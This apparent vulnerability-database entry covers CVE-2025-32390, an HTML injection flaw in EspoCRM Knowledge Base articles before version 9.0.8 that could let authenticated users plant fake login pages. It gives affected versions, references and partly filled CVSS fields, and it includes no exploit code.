HTML Injection Vulnerability in EspoCRM Knowledge Base Articles
CVE-2025-32390

7HIGH

Key Information:

Vendor: Espocrm
Status: Espocrm
Vendor: CVE Published:; 12 May 2025

What is CVE-2025-32390?

EspoCRM, an open-source CRM platform, is susceptible to an HTML injection vulnerability in its Knowledge Base articles. Prior to version 9.0.8, this flaw permits authenticated users with access to read KB articles to inject malicious HTML code. This allows attackers to create harmful articles that mimic legitimate login pages, therefore capturing users' credentials in plain text. The permissive HTML editing rights granted to KB articles facilitate this exploitation. In environments with multiple applications, this vulnerability could be used to create convincing phishing scenarios, further endangering user credentials across various platforms. The issue has been addressed in version 9.0.8.

Affected Version(s)

espocrm < 9.0.8

References

https://github.com/espocrm/espocrm/security/advisories/GH...

x_refsource_CONFIRM

https://github.com/espocrm/espocrm/commit/6b58d30eec8864d...

x_refsource_MISC

CVSS V4

Score:

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

None

Privileges Required:

Undefined

User Interaction:

Unknown

Timeline

Vulnerability published
May 12, 2025
Vulnerability Reserved
Apr 6, 2025

Espocrm

What is CVE-2025-32390?

Affected Version(s)

References

CVSS V4

Timeline